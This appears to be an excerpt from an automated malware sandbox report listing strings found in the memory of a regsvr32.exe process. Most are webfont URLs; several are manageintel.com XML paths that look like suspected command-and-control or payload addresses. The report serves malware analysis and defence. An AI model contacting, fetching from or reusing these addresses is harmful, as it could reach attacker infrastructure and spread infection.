https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwlBduz8A.woff2)
Source: regsvr32.exe, 00000003.00000003.2401673136.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwlxdu.woff2
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427445026.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427121426.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427017898.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwlxdu.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427445026.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427121426.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427017898.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwmBduz8A.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427445026.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427121426.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427017898.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwmRduz8A.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwmhduz8A.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427445026.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427121426.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427017898.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwmxduz8A.woff2)
Source: regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427432119.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwkxduz8A.wof
Source: regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427432119.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwkxduz8A.wof__
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwkxduz8A.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwlBduz8A.woff2)
Source: regsvr32.exe, 00000003.00000003.2401673136.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwlxdu.woff2
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwlxdu.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwmBduz8A.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwmRduz8A.woff2)
Source: regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427432119.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwmhduz8A.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwmxduz8A.woff2)
Source: regsvr32.exe, 00000003.00000003.2427084848.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/isteam/videos/uA41GmyyG8IMaxXdb
Source: regsvr32.exe, 00000003.00000003.2401673136.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://isteam.wsimg.com
Source: regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/
Source: regsvr32.exe, 00000003.00000002.2427314775.0000000002E4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/(
Source: regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/404
Source: regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/=
Source: regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/Host:
Source: regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/O
Source: regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427432119.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml
Source: regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427432119.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml1
Source: regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xmlF
Source: regsvr32.exe, 00000003.00000002.2427314775.0000000002E4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xmlFindOIDInfo
Source: regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xmlS
Source: regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427432119.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xmla
Source: regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xmlc
Source: regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xmls
Source: regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xml
Source: regsvr32.exe, 00000003.00000003.2414329382.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401673136.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xmlD
Source: regsvr32.exe, 00000003.00000003.2414329382.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401673136.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xmlP
Source: regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xmlS
Source: regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xmlc
Source: regsvr32.exe, 00000003.00000002.2427314775.0000000002E4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xmlertificates
Source: regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xmls
